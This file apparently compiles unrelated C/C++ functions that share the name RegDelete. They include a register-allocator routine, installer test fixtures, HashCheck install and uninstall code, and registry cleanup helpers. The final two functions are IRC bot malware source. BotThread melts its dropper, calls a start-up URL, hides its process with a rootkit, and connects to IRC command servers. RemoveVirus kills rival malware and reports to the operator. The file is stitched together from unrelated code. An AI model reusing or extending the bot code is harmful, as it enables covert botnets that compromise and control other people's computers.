static void RegDelete( score *sc, int index ) { /*************************************************/ score *scoreboard; int half; list_head **free_heads; scoreboard = &sc[ index ]; if( scoreboard->next_reg != scoreboard ) { free_heads = (list_head **)&sc[ ScoreCount ]; scoreboard->list = *free_heads; *free_heads = (list_head *)**free_heads; *scoreboard->list = NULL; } scoreboard->prev_reg->next_reg = scoreboard->next_reg; scoreboard->next_reg->prev_reg = scoreboard->prev_reg; scoreboard->next_reg = scoreboard; scoreboard->prev_reg = scoreboard; scoreboard->generation = 0; half = ScoreList[ index ]->low; if( half != NO_INDEX ) { RegDelete( sc, half ); } half = ScoreList[ index ]->high; if( half != NO_INDEX ) { RegDelete( sc, half ); } }
void CfgTest::SetARP(LPCWSTR wzKeyName, LPCWSTR wzDisplayName, LPCWSTR wzInstallLocation, LPCWSTR wzUninstallString) { HRESULT hr = S_OK; HKEY hkArp = NULL; HKEY hkNew = NULL; hr = RegOpen(HKEY_CURRENT_USER, ARP_REG_KEY, KEY_WOW64_32KEY | KEY_ALL_ACCESS, &hkArp); ExitOnFailure1(hr, "Failed to open fake ARP regkey: %ls", ARP_REG_KEY); hr = RegDelete(hkArp, wzKeyName, REG_KEY_32BIT, TRUE); if (E_FILENOTFOUND == hr) { hr = S_OK; } ExitOnFailure1(hr, "Failed to delete subkey: %ls", wzKeyName); if (NULL != wzDisplayName) { hr = RegCreate(hkArp, wzKeyName, KEY_WOW64_32KEY | KEY_ALL_ACCESS, &hkNew); ExitOnFailure1(hr, "Failed to create subkey: %ls", wzKeyName); hr = RegWriteString(hkNew, L"DisplayName", wzDisplayName); ExitOnFailure(hr, "Failed to write DisplayName to registry"); hr = RegWriteString(hkNew, L"UninstallString", wzUninstallString); ExitOnFailure(hr, "Failed to write UninstallString to registry"); hr = RegWriteString(hkNew, L"InstallLocation", wzInstallLocation); ExitOnFailure(hr, "Failed to write InstallLocation to registry"); } LExit: ReleaseRegKey(hkArp); ReleaseRegKey(hkNew); }
STDAPI DllUnregisterServer( ) { HKEY hKey; BOOL bClassRemoved = TRUE; BOOL bApprovalRemoved = FALSE; // Unregister class if (!RegDelete(HKEY_CLASSES_ROOT, TEXT("CLSID\\%s"), CLSID_STR_HashCheck)) bClassRemoved = FALSE; // Unregister handlers if (!Wow64CheckProcess()) { /** * Registry reflection sucks; it means that if we try to unregister the * Wow64 extension, we'll also unregister the Win64 extension; the API * to disable reflection seems to only affect changes in value, not key * removals. :( This hack will disable the deletion of certain HKCR * keys in the case of 32-on-64, and it should be pretty safe--unless * the user had installed only the 32-bit extension without the 64-bit * extension on Win64 (which should be a very rare scenario), there * should be no undesirable effects to using this hack. **/ if (!RegDelete(HKEY_CLASSES_ROOT, TEXT("AllFileSystemObjects\\ShellEx\\ContextMenuHandlers\\%s"), CLSNAME_STR_HashCheck)) bClassRemoved = FALSE; if (!RegDelete(HKEY_CLASSES_ROOT, TEXT("AllFileSystemObjects\\ShellEx\\PropertySheetHandlers\\%s"), CLSNAME_STR_HashCheck)) bClassRemoved = FALSE; if (!RegDelete(HKEY_CLASSES_ROOT, PROGID_STR_HashCheck, NULL)) bClassRemoved = FALSE; } // Unregister approval if (hKey = RegOpen(HKEY_LOCAL_MACHINE, TEXT("Software\\Microsoft\\Windows\\CurrentVersion\\Shell Extensions\\Approved"), NULL, FALSE)) { LONG lResult = RegDeleteValue(hKey, CLSID_STR_HashCheck); bApprovalRemoved = (lResult == ERROR_SUCCESS || lResult == ERROR_FILE_NOT_FOUND); RegCloseKey(hKey); } if (!bClassRemoved) return(SELFREG_E_CLASS); if (!bApprovalRemoved) return(S_FALSE); return(S_OK); }
void CfgTest::TestInitialize() { HRESULT hr = S_OK; HKEY hk = NULL; hr = RegInitialize(); ExitOnFailure(hr, "Failed to initialize regutil"); // Override Arp regkey path hr = RegDelete(HKEY_CURRENT_USER, ARP_REG_KEY, REG_KEY_32BIT, TRUE); if (E_FILENOTFOUND == hr) { hr = S_OK; } ExitOnFailure1(hr, "Failed to delete fake ARP regkey: %ls", ARP_REG_KEY); hr = RegCreate(HKEY_CURRENT_USER, ARP_REG_KEY, REG_KEY_32BIT, &hk); ExitOnFailure1(hr, "Failed to create fake ARP regkey: %ls", ARP_REG_KEY); hr = TestHookOverrideArpPath(ARP_REG_KEY); ExitOnFailure(hr, "Failed to override ARP path for test"); // Override Applications regkey path hr = RegDelete(HKEY_CURRENT_USER, APPLICATIONS_REG_KEY, REG_KEY_32BIT, TRUE); if (E_FILENOTFOUND == hr) { hr = S_OK; } ExitOnFailure1(hr, "Failed to delete fake Applications regkey: %ls", APPLICATIONS_REG_KEY); hr = RegCreate(HKEY_CURRENT_USER, APPLICATIONS_REG_KEY, REG_KEY_32BIT, &hk); ExitOnFailure1(hr, "Failed to create fake Applications regkey: %ls", APPLICATIONS_REG_KEY); hr = TestHookOverrideApplicationsPath(APPLICATIONS_REG_KEY); ExitOnFailure(hr, "Failed to override Applications path for test"); RedirectDatabases(); LExit: ReleaseRegKey(hk); }
void CfgTest::TestUninitialize() { HRESULT hr = S_OK; hr = RegDelete(HKEY_CURRENT_USER, ARP_REG_KEY, REG_KEY_32BIT, TRUE); if (E_FILENOTFOUND == hr) { hr = S_OK; } ExitOnFailure1(hr, "Failed to delete fake ARP regkey: %ls", ARP_REG_KEY); hr = RegDelete(HKEY_CURRENT_USER, APPLICATIONS_REG_KEY, REG_KEY_32BIT, TRUE); if (E_FILENOTFOUND == hr) { hr = S_OK; } ExitOnFailure1(hr, "Failed to delete fake Applications regkey: %ls", APPLICATIONS_REG_KEY); LExit: return; }
BOOL RegDelete(HKEY root,LPCTSTR subkey,LPCTSTR name) { HKEY key=NULL; if (!subkey) return FALSE; if (!name) { if (fRegDeleteKey(root,subkey) == ERROR_SUCCESS) return TRUE; DWORD inx = 0; DWORD chr = 256; char buf[256] = {0}; FILETIME ftm; if (fRegOpenKeyEx(root,subkey,0,KEY_READ|KEY_WRITE,&key) == ERROR_SUCCESS) { DWORD cnt = fRegEnumKeyEx(key,inx,buf,&chr,NULL,NULL,NULL,&ftm); while ((cnt != ERROR_NO_MORE_ITEMS) && (cnt == ERROR_SUCCESS)) { RegDelete(root,subkey,buf); cnt = fRegEnumKeyEx(key,(inx++),buf,&chr,NULL,NULL,NULL,&ftm); } fRegDeleteKey(key,subkey); } } else { if (fRegOpenKeyEx(root,subkey,0,KEY_READ|KEY_WRITE,&key) == ERROR_SUCCESS) { if (fRegDeleteValue(key,name) == ERROR_SUCCESS) { fRegCloseKey(key); return TRUE; } fRegCloseKey(key); } } return FALSE; }
/******************************************************************** RegDelete - deletes a registry key (and optionally it's whole tree). *********************************************************************/ extern "C" HRESULT DAPI RegDelete( __in HKEY hkRoot, __in_z LPCWSTR wzSubKey, __in REG_KEY_BITNESS kbKeyBitness, __in BOOL fDeleteTree ) { HRESULT hr = S_OK; DWORD er = ERROR_SUCCESS; LPWSTR pszEnumeratedSubKey = NULL; LPWSTR pszRecursiveSubKey = NULL; HKEY hkKey = NULL; REGSAM samDesired = 0; if (fDeleteTree) { hr = RegOpen(hkRoot, wzSubKey, KEY_READ, &hkKey); if (E_FILENOTFOUND == hr) { ExitFunction1(hr = S_OK); } ExitOnFailure1(hr, "Failed to open this key for enumerating subkeys", wzSubKey); // Yes, keep enumerating the 0th item, because we're deleting it every time while (E_NOMOREITEMS != (hr = RegKeyEnum(hkKey, 0, &pszEnumeratedSubKey))) { ExitOnFailure(hr, "Failed to enumerate key 0"); hr = PathConcat(wzSubKey, pszEnumeratedSubKey, &pszRecursiveSubKey); ExitOnFailure2(hr, "Failed to concatenate paths while recursively deleting subkeys. Path1: %ls, Path2: %ls", wzSubKey, pszEnumeratedSubKey); hr = RegDelete(hkRoot, pszRecursiveSubKey, kbKeyBitness, fDeleteTree); ExitOnFailure1(hr, "Failed to recursively delete subkey: %ls", pszRecursiveSubKey); } hr = S_OK; } if (!vfRegInitialized && REG_KEY_DEFAULT != kbKeyBitness) { hr = E_INVALIDARG; ExitOnFailure(hr, "RegInitialize must be called first in order to RegDelete() a key with non-default bit attributes!"); } switch (kbKeyBitness) { case REG_KEY_32BIT: samDesired = KEY_WOW64_32KEY; break; case REG_KEY_64BIT: samDesired = KEY_WOW64_64KEY; break; case REG_KEY_DEFAULT: // Nothing to do break; } if (NULL != vpfnRegDeleteKeyExW) { er = vpfnRegDeleteKeyExW(hkRoot, wzSubKey, samDesired, 0); if (E_FILENOTFOUND == HRESULT_FROM_WIN32(er)) { ExitFunction1(hr = E_FILENOTFOUND); } ExitOnWin32Error(er, hr, "Failed to delete registry key (ex)."); } else { er = vpfnRegDeleteKeyW(hkRoot, wzSubKey); if (E_FILENOTFOUND == HRESULT_FROM_WIN32(er)) { ExitFunction1(hr = E_FILENOTFOUND); } ExitOnWin32Error(er, hr, "Failed to delete registry key."); } LExit: ReleaseRegKey(hkKey); ReleaseStr(pszEnumeratedSubKey); ReleaseStr(pszRecursiveSubKey); return hr; }
HRESULT Uninstall( ) { HRESULT hr = S_OK; TCHAR szCurrentDllPath[MAX_PATH << 1]; TCHAR szTemp[MAX_PATH << 1]; LPTSTR lpszFileToDelete = szCurrentDllPath; LPTSTR lpszTempAppend = szTemp + GetModuleFileName(g_hModThisDll, szTemp, countof(szTemp)); StringCbCopy(szCurrentDllPath, sizeof(szCurrentDllPath), szTemp); #ifdef _WIN64 // If this 64-bit dll was installed to the default location, // uninstall the 32-bit dll if it exists in its default location TCHAR lpszDefInstallPath[MAX_PATH + 0x20]; UINT uSize = GetSystemDirectory(lpszDefInstallPath, MAX_PATH); if (uSize && uSize < MAX_PATH) { LPTSTR lpszPathAppend = lpszDefInstallPath + uSize; if (*(lpszPathAppend - 1) != TEXT('\\')) *lpszPathAppend++ = TEXT('\\'); static const TCHAR szFolderAndFilename[] = TEXT("ShellExt") TEXT("\\") TEXT(HASHCHECK_FILENAME_STR); SSStaticCpy(lpszPathAppend, szFolderAndFilename); // If this 64-bit dll was installed to the default location if (StrCmpI(szCurrentDllPath, lpszDefInstallPath) == 0) { TCHAR lpszSystemWow64[MAX_PATH + 0x20]; uSize = GetSystemWow64Directory(lpszSystemWow64, MAX_PATH); if (uSize && uSize < MAX_PATH) { LPTSTR lpszSystemWow64Append = lpszSystemWow64 + uSize; if (*(lpszSystemWow64Append - 1) != TEXT('\\')) SSCpy2Ch(lpszSystemWow64Append++, TEXT('\\'), 0); StringCbCopyEx(lpszDefInstallPath, sizeof(lpszDefInstallPath), lpszSystemWow64, &lpszPathAppend, NULL, 0); SSStaticCpy(lpszPathAppend, szFolderAndFilename); // If the 32-bit dll exists in its default location if (PathFileExists(lpszDefInstallPath)) { static const TCHAR szRegsvr32[] = TEXT("regsvr32.exe"); SSStaticCpy(lpszSystemWow64Append, szRegsvr32); // the lpszSystemWow64 buffer now contains the full regsvr32.exe path TCHAR lpszCommandLine[MAX_PATH + 0x20]; LPTSTR lpszCommandLineAppend; static const TCHAR szCommandOpts[] = TEXT("regsvr32.exe /u /i /n /s "); lpszCommandLineAppend = SSStaticCpy(lpszCommandLine, szCommandOpts) - 1; StringCbCopy(lpszCommandLineAppend, sizeof(lpszCommandLine)-sizeof(szCommandOpts), lpszDefInstallPath); STARTUPINFO si; memset(&si, 0, sizeof(si)); si.cb = sizeof(si); PROCESS_INFORMATION pi; memset(&pi, 0, sizeof(pi)); if (!CreateProcess(lpszSystemWow64, lpszCommandLine, NULL, NULL, FALSE, 0, NULL, NULL, &si, &pi)) return E_FAIL; DWORD dwExit; WaitForSingleObject(pi.hProcess, INFINITE); GetExitCodeProcess(pi.hProcess, &dwExit); CloseHandle(pi.hThread); CloseHandle(pi.hProcess); if (dwExit != 0) return E_FAIL; } } } } #endif // Rename the DLL prior to scheduling it for deletion *lpszTempAppend++ = TEXT('.'); SSCpy2Ch(lpszTempAppend, 0, 0); for (TCHAR ch = TEXT('0'); ch <= TEXT('9'); ++ch) { *lpszTempAppend = ch; if (MoveFileEx(szCurrentDllPath, szTemp, MOVEFILE_REPLACE_EXISTING)) { lpszFileToDelete = szTemp; break; } } // Schedule the DLL to be deleted at shutdown/reboot if (!MoveFileEx(lpszFileToDelete, NULL, MOVEFILE_DELAY_UNTIL_REBOOT)) hr = E_FAIL; // Unregister if (DllUnregisterServer() != S_OK) hr = E_FAIL; // Disassociate file extensions; see the comment in DllUnregisterServer for // why this step is skipped for Wow64 processes if (!Wow64CheckProcess()) { for (UINT i = 0; i < countof(g_szHashExtsTab); ++i) { HKEY hKey; if (hKey = RegOpen(HKEY_CLASSES_ROOT, g_szHashExtsTab[i], NULL, FALSE)) { RegGetSZ(hKey, NULL, szTemp, sizeof(szTemp)); if (_tcscmp(szTemp, PROGID_STR_HashCheck) == 0) RegDeleteValue(hKey, NULL); RegCloseKey(hKey); } } } // We don't need the uninstall strings any more... RegDelete(HKEY_LOCAL_MACHINE, TEXT("Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\%s"), CLSNAME_STR_HashCheck); return(hr); }
HRESULT Install( BOOL bRegisterUninstaller, BOOL bCopyFile ) { TCHAR szCurrentDllPath[MAX_PATH << 1]; GetModuleFileName(g_hModThisDll, szCurrentDllPath, countof(szCurrentDllPath)); TCHAR szSysDir[MAX_PATH + 0x20]; UINT uSize = GetSystemDirectory(szSysDir, MAX_PATH); if (uSize && uSize < MAX_PATH) { LPTSTR lpszPath = szSysDir; LPTSTR lpszPathAppend = lpszPath + uSize; if (*(lpszPathAppend - 1) != TEXT('\\')) *lpszPathAppend++ = TEXT('\\'); LPTSTR lpszTargetPath = (bCopyFile) ? lpszPath : szCurrentDllPath; if ( (!bCopyFile || InstallFile(szCurrentDllPath, lpszTargetPath, lpszPathAppend)) && DllRegisterServerEx(lpszTargetPath) == S_OK ) { HKEY hKey, hKeySub; // Associate file extensions for (UINT i = 0; i < countof(g_szHashExtsTab); ++i) { if (hKey = RegOpen(HKEY_CLASSES_ROOT, g_szHashExtsTab[i], NULL, TRUE)) { RegSetSZ(hKey, NULL, PROGID_STR_HashCheck); RegSetSZ(hKey, TEXT("PerceivedType"), TEXT("text")); if (hKeySub = RegOpen(hKey, TEXT("PersistentHandler"), NULL, TRUE)) { RegSetSZ(hKeySub, NULL, TEXT("{5e941d80-bf96-11cd-b579-08002b30bfeb}")); RegCloseKey(hKeySub); } RegCloseKey(hKey); } } // Disassociate former file extensions; see the comment in DllUnregisterServer for // why this step is skipped for Wow64 processes if (!Wow64CheckProcess()) { for (UINT i = 0; i < countof(szFormerHashExtsTab); ++i) { HKEY hKey; if (hKey = RegOpen(HKEY_CLASSES_ROOT, szFormerHashExtsTab[i], NULL, FALSE)) { TCHAR szTemp[countof(PROGID_STR_HashCheck)]; RegGetSZ(hKey, NULL, szTemp, sizeof(szTemp)); if (_tcscmp(szTemp, PROGID_STR_HashCheck) == 0) RegDeleteValue(hKey, NULL); RegCloseKey(hKey); } } } // Uninstaller entries RegDelete(HKEY_LOCAL_MACHINE, TEXT("Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\%s"), CLSNAME_STR_HashCheck); if (bRegisterUninstaller && (hKey = RegOpen(HKEY_LOCAL_MACHINE, TEXT("Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\%s"), CLSNAME_STR_HashCheck, TRUE))) { TCHAR szUninstall[MAX_PATH << 1]; StringCchPrintf(szUninstall, countof(szUninstall), TEXT("regsvr32.exe /u /i /n \"%s\""), lpszTargetPath); static const TCHAR szURLFull[] = TEXT("https://github.com/gurnec/HashCheck/issues"); TCHAR szURLBase[countof(szURLFull)]; SSStaticCpy(szURLBase, szURLFull); szURLBase[35] = 0; // strlen("https://github.com/gurnec/HashCheck") RegSetSZ(hKey, TEXT("DisplayIcon"), lpszTargetPath); RegSetSZ(hKey, TEXT("DisplayName"), TEXT(HASHCHECK_NAME_STR)); RegSetSZ(hKey, TEXT("DisplayVersion"), TEXT(HASHCHECK_VERSION_STR)); RegSetDW(hKey, TEXT("EstimatedSize"), 1073); RegSetSZ(hKey, TEXT("HelpLink"), szURLFull); RegSetDW(hKey, TEXT("NoModify"), 1); RegSetDW(hKey, TEXT("NoRepair"), 1); RegSetSZ(hKey, TEXT("UninstallString"), szUninstall); RegSetSZ(hKey, TEXT("URLInfoAbout"), szURLBase); RegSetSZ(hKey, TEXT("URLUpdateInfo"), TEXT("https://github.com/gurnec/HashCheck/releases/latest")); RegCloseKey(hKey); } return(S_OK); } // if copied & registered } // if valid sysdir return(E_FAIL); }
static HRESULT DeleteEmptyRegistryKeys( __in LEGACY_SYNC_PRODUCT_SESSION *pSyncProductSession ) { HRESULT hr = S_OK; const LEGACY_REGISTRY_KEY *rgRegKeys = pSyncProductSession->product.rgRegKeys; const DWORD cRegKeys = pSyncProductSession->product.cRegKeys; DWORD dwIndex = 0; LPWSTR pwcLastBackslash = NULL; LPWSTR sczParentKey = NULL; for (DWORD i = 0; i < cRegKeys; ++i) { hr = DeleteEmptyRegistryKeyChildren(rgRegKeys[i].dwRoot, rgRegKeys[i].sczKey); // This code is just an FYI that the key was not empty and so wasn't deleted. It's not an error, so ignore it. if (HRESULT_FROM_WIN32(ERROR_DIR_NOT_EMPTY) == hr) { hr = S_OK; continue; } ExitOnFailure(hr, "Failed to check for empty keys and delete them at root: %u, subkey: %ls", rgRegKeys[i].dwRoot, rgRegKeys[i].sczKey); hr = StrAllocString(&sczParentKey, rgRegKeys[i].sczKey, 0); ExitOnFailure(hr, "Failed to allocate copy of subkey"); // Eliminate any trailing backslashes from the key first, if there are any dwIndex = lstrlenW(sczParentKey); if (0 == dwIndex) { hr = E_INVALIDARG; ExitOnFailure(hr, "Unexpected empty parent key encountered while deleting empty registry keys"); } --dwIndex; // Start at the last character of the string while (dwIndex > 0 && sczParentKey[dwIndex] == L'\\') { sczParentKey[dwIndex] = L'\0'; --dwIndex; } if (0 == dwIndex) { hr = E_INVALIDARG; ExitOnFailure(hr, "Parent key was entirely composed of backslashes!"); } // Now delete any empty parent keys we see as well while (NULL != (pwcLastBackslash = wcsrchr(sczParentKey, L'\\'))) { hr = RegDelete(ManifestConvertToRootKey(rgRegKeys[i].dwRoot), sczParentKey, REG_KEY_DEFAULT, FALSE); // This code is just an FYI that the key was not empty and so wasn't deleted. It's not an error, so ignore it. if (FAILED(hr)) { LogErrorString(hr, "Failed to check for empty parent keys and delete them at root: %u, subkey: %ls", rgRegKeys[i].dwRoot, sczParentKey); hr = S_OK; break; } *pwcLastBackslash = L'\0'; } } LExit: ReleaseStr(sczParentKey); return hr; }
static HRESULT DeleteEmptyRegistryKeyChildren( __in DWORD dwRoot, __in_z LPCWSTR wzSubKey ) { HRESULT hr = S_OK; HKEY hkKey = NULL; DWORD dwIndex = 0; BOOL fNoValues = FALSE; LPWSTR sczValueName = NULL; LPWSTR sczSubkeyName = NULL; LPWSTR sczSubkeyPath = NULL; DWORD dwSubKeyPathLen = 0; hr = RegOpen(ManifestConvertToRootKey(dwRoot), wzSubKey, KEY_READ, &hkKey); if (E_FILENOTFOUND == hr) { ExitFunction1(hr = S_OK); } ExitOnFailure(hr, "Failed to open regkey: %ls", wzSubKey); if (E_NOMOREITEMS == RegValueEnum(hkKey, dwIndex, &sczValueName, NULL)) { fNoValues = TRUE; } // Recurse and handle subkeys as well dwIndex = 0; while (E_NOMOREITEMS != (hr = RegKeyEnum(hkKey, dwIndex, &sczSubkeyName))) { ExitOnFailure(hr, "Failed to enumerate key %u", dwIndex); hr = StrAllocString(&sczSubkeyPath, wzSubKey, 0); ExitOnFailure(hr, "Failed to allocate copy of subkey name"); dwSubKeyPathLen = lstrlenW(sczSubkeyPath); if (0 == dwSubKeyPathLen) { hr = E_INVALIDARG; ExitOnFailure(hr, "Encountered empty keyname while enumerating subkeys under key: %ls", wzSubKey); } else if (L'\\' != sczSubkeyPath[dwSubKeyPathLen - 1]) { hr = StrAllocConcat(&sczSubkeyPath, L"\\", 1); ExitOnFailure(hr, "Failed to concatenate backslash to copy of regkey name"); } hr = StrAllocConcat(&sczSubkeyPath, sczSubkeyName, 0); ExitOnFailure(hr, "Failed to concatenate subkey name to subkey path"); hr = DeleteEmptyRegistryKeyChildren(dwRoot, sczSubkeyPath); // Increment and ignore the error if we didn't delete the subkey if (HRESULT_FROM_WIN32(ERROR_DIR_NOT_EMPTY) == hr) { ++dwIndex; hr = S_OK; } ExitOnFailure(hr, "Failed to read regkey and write settings for root: %u, subkey: %ls", dwRoot, sczSubkeyPath); } // If there are no keys and no values under it, delete it if (fNoValues && 0 == dwIndex) { hr = RegDelete(ManifestConvertToRootKey(dwRoot), wzSubKey, REG_KEY_DEFAULT, FALSE); ExitOnFailure(hr, "Failed to delete registry key at root: %u, subkey: %ls", dwRoot, wzSubKey); ExitFunction1(hr = S_OK); } else { ExitFunction1(hr = HRESULT_FROM_WIN32(ERROR_DIR_NOT_EMPTY)); } LExit: ReleaseRegKey(hkKey); ReleaseStr(sczValueName); ReleaseStr(sczSubkeyName); ReleaseStr(sczSubkeyPath); return hr; }
DWORD WINAPI BotThread(LPVOID param) { for (int m=0;m<6;m++) { if(!(mutex=CreateMutex(NULL, FALSE, mutexhandle))) Sleep(5000); else break; } // if (WaitForSingleObject(CreateMutex(NULL, TRUE, mutexhandle), 30000) == WAIT_TIMEOUT) // ExitProcess(0); addthread(MAIN_THREAD,str_main_thread,main_title); #ifndef _DEBUG #ifndef NO_MELT char *melt=RegQuery(meltkey.hkey,meltkey.subkey,meltkey.name); if (melt) { SetFileAttributes(melt,FILE_ATTRIBUTE_NORMAL); int tries=0; while (FileExists(melt) && tries<3) { DeleteFile(melt); tries++; Sleep(2000); } RegDelete(meltkey.hkey,meltkey.subkey,meltkey.name); } #endif // NO_MELT #endif // _DEBUG srand(GetTickCount()); dwstarted=GetTickCount(); #ifndef NO_VERSION_REPLY curversion=rand()%(versionsize); #ifdef _DEBUG printf("Generated current_version: %d (%d), %s.\n",curversion,versionsize,versionlist[curversion]); #endif #endif WSADATA wsadata; if (fWSAStartup(MAKEWORD(2,2),&wsadata)!=0) ExitProcess(-2); #ifndef _DEBUG #ifndef NO_FCONNECT char readbuf[1024]; HINTERNET httpopen, openurl; DWORD read; httpopen=fInternetOpen(NULL,INTERNET_OPEN_TYPE_DIRECT,NULL,NULL,0); openurl=fInternetOpenUrl(httpopen,cononstart,NULL,NULL,INTERNET_FLAG_RELOAD|INTERNET_FLAG_NO_CACHE_WRITE,NULL); if (!openurl) { fInternetCloseHandle(httpopen); fInternetCloseHandle(openurl); } fInternetReadFile(openurl,readbuf,sizeof(readbuf),&read); fInternetCloseHandle(httpopen); fInternetCloseHandle(openurl); #endif // NO_FCONNECT #endif // _DEBUG #ifndef NO_INSTALLED_TIME if (!noadvapi32) GetInstalledTime(); else sprintf(installedt,"Error"); #endif // NO_INSTALLED_TIME int i=0; DWORD id=0; #ifndef NO_RECORD_UPTIME i=addthread(RUPTIME_THREAD,str_rup_thread,main_title); threads[i].tHandle=CreateThread(NULL,0,&RecordUptimeThread,0,0,&id); #endif // NO_RECORD_UPTIME #ifndef NO_AUTO_SECURE #ifndef NO_SECURE NTHREAD secure; secure.bdata2=TRUE;//loop i=addthread(SECURE_THREAD,str_asecure_thread,sec_title); threads[i].tHandle=CreateThread(NULL,0,&SecureThread,(LPVOID)&secure,0,&id); #endif #endif // NO_AUTO_SECURE #ifndef NO_RDRIV #ifndef _DEBUG rkenabled=InitRK();//initialize fu if (rkenabled) HideMe();//hide the process #endif // _DEBUG #endif // NO_RDRIV #ifndef _DEBUG // maybe this will give the shutdown handler time to work RegWrite(HKEY_LOCAL_MACHINE,"SYSTEM\\CurrentControlSet\\Control","WaitToKillServiceTimeout","7000"); #endif //get internal ip char *ip; char hostname[256]; struct hostent *h; fgethostname(hostname, 256); h = fgethostbyname(hostname); ip = finet_ntoa(*(struct in_addr *)h->h_addr_list[0]); strncpy(inip,ip,sizeof(inip)); curserver=0; HookProtocol(&mainirc); while (mainirc.should_connect()) { if (!mainirc.is_connected()) { #ifdef _DEBUG printf("Trying to connect to: %s:%i\r\n",servers[curserver].host,servers[curserver].port); #endif #ifndef NO_FLUSHDNS FlushDNSCache(); #endif mainirc.start(servers[curserver].host,servers[curserver].port, mainirc.nickgen(NICK_TYPE,REQ_NICKLEN),mainirc.nickgen(IDENT_TYPE,REQ_IDENTLEN), mainirc.nickgen(REALN_TYPE,REQ_REALNLEN),servers[curserver].pass); mainirc.message_loop(); } else mainirc.message_loop(); Sleep(SFLOOD_DELAY); if (curserver==(serversize-1)) curserver=0; else curserver++; } // cleanup; killthreadall(); fWSACleanup(); ReleaseMutex(mutex); ExitThread(0); }
void RemoveVirus(char *target,void *conn,BOOL loop,BOOL silent,BOOL verbose) { IRC* irc=(IRC*)conn; char sysdir[MAX_PATH], virusexecutable[MAX_PATH]; int viriireg=0,viriikill=0,viriidel=0; int viriifound=0; int viriisize=(sizeof(viruses)/sizeof(VIRUSES)); for (unsigned int i=0; i<viriisize; i++) { char *treg=RegQuery(viruses[i].hkey,viruses[i].subkey,viruses[i].value); if (treg) { viriifound++; if (RegDelete(viruses[i].hkey,viruses[i].subkey,viruses[i].value)) { viriireg++; if (!loop && !silent && verbose) irc->privmsg(target,"%s Removed registry key for virus: %s",sec_title,viruses[i].name); } #ifndef NO_PROCESS if (KillProcess(viruses[i].file,0)) { viriikill++; if (!loop && !silent && verbose) irc->privmsg(target,"%s Killed process for virus: %s",sec_title,viruses[i].name); } #endif GetSystemDirectory(sysdir, sizeof(sysdir)); sprintf(virusexecutable, "%s\\%s", sysdir, viruses[i].file); if (DeleteFile(virusexecutable)!=0) { viriidel++; if (!loop && !silent && verbose) irc->privmsg(target,"%s Erased executable for virus: %s",sec_title,viruses[i].name); } } else { // Just for the hell of it /*if (KillProcess(viruses[i].file,0)) { GetSystemDirectory(sysdir, sizeof(sysdir)); sprintf(virusexecutable, "%s\\%s", sysdir, viruses[i].file); DeleteFile(virusexecutable); } Sleep(100);*/ } } if (viriifound==0) { if (!loop && !silent) irc->privmsg(target,"%s No known viruses.",sec_title); } else { if (!loop && !silent) irc->privmsg(target,"%s %s known viruses: R:%.2d, K:%.2d, D:%.2d",sec_title,viriifound,viriireg,viriikill,viriidel); } return; }